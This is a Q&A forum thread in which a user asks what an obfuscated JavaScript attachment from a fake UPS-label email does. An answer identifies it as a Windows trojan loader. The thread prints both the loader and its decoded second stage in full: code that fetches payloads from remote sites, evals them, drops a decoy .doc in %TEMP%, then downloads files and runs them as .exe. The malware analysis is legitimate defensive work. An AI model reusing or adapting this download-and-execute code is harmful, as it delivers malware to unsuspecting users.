# Email with UPS Label script what does it do?

Tags: html-email

I got email today somebody sent me as a ups label i did not open it as i found it suspicious i would like to know what this code do,

thanks

```js
var sder = "P";
var g2 = "M"+"sxml2.XMLHT"+""+"T"+""+sder;

var m = "LZUaj4-qfCYW4M3kjDIgGL844Arvxk8a-hL2LmwUe1fG4_p62GL1yQkO5QZj62RgjWMzKm3mojn5OZRDSmV0C9O7RF_9Lw";

var x = new Array("site link", "site link", "site link", "site link", "site link");
var t4 = "ht"+"tp";

var mul = "qwadro";
var ter = "/";
for (var i=0; i<x.length; i++)
{ 
 var vDJmB = function(){
  return new ActiveXObject(g2);
 }();
 var e = vDJmB;

 try
 {
  e.open("G"+"E"+"T", t4 + ":"+ter+ter+x[i]+"/c"+"o"+"unter/?"+m, false);
  e.send();

  var r = e.responseText;

  if (r.length > 999+1 && r.indexOf(m) > -1)
  {
   eval(e.responseText.split(m).join(mul.substring(2,3)));

   break;
  };
 }
 catch(e)
 {
 };
};
```

I want to know what this code do, Somebody was trying to get information from me? thanks

Answer (score 0, accepted):

It is a Trojan loader specifically targeted to Microsoft Windows. It creates a pointer, `e`, to an `Msxml2.XMLHTTP` activeX object, `vDJmB`.

Then it sequences through the sites in array `x` using the key `m` to get a multi-part encoded plain text payload component, `r`. That component payload is decoded into a JavaScript string that is then evaluated. Each component element is between 5972 and 6266 characters long. In my version there are five components.

The actual payload, when decoded and evaluated, references several other websites, creates several objects, creates a random character file with .doc extension, tries to run it then catches the error into a null handler, then downloads a png, renames it to an exe then runs it... Pretty sophisticated obfuscation, I'd say. What does it ultimately grab? Can't tell you because I don't have a Windows system.

The first component does as follows (there are five of these components in mine with different site names):

```
var ld = 0;
var cs = String.fromCharCode(92);
var ll = [ "seperate_site2.com", "site_in_original4.com", "site_in_original4", "seperate_site2", "site_in_original1.com" ];
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
var xo = WScript.CreateObject("Msxml2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var fo = WScript.CreateObject("Scripting.FileSystemObject");
if (!fo.FileExists(fn + ".doc")) {
  var fp = fo.CreateTextFile(fn + ".doc", true);
  for (var i = 0; i < 8339; i++) {
    fp.Write(String.fromCharCode(Math.floor(Math.random() * 64 + 20)));
  };
  fp.Close();
  try {ws.Run(fn + ".doc", 1, 0);} catch (er) {};
  for (var n = 1; n <= 2; n++) {
    for (var i = ld; i < ll.length; i++) {
      var dn = 0;
      try {
        xo.open("GET", "http://" + ll[ i ] + "/counter/?" + n, false);
        xo.send();
        if (xo.status == 200) {
          xa.open();
          xa.type = 1;
          xa.write(xo.responseBody);
          if (xa.size > 10000) {
            dn = 1;
            xa.saveToFile(fn + n + ".exe", 2);
            try {ws.Run(fn + n + ".exe", 1, 0);} catch (er) {};
          };
          xa.close();
        };
        if (dn == 1) {
          ld = i;
          break;
        };
      } catch (er) {};
    };
  };
} else {
  try {ws.Run(fn + ".doc", 1, 0);} catch (er) {};
};
```

I used rhino-debugger and Eclipse on Ubuntu 16.04 to evaluate this loader.

Comment: main question it what it gets from user who execute it, i also dont have windows.

Comment: @JunaidAbbasi The true payload is in the downloaded png file that gets renamed to an exe. Until that gets analyzed in a secure environment, i.e. firejail, your guess is as good as mine... If I get farther along in the analysis with something like wine, I'll link it here. These kinds of analysis I usually post on my business website.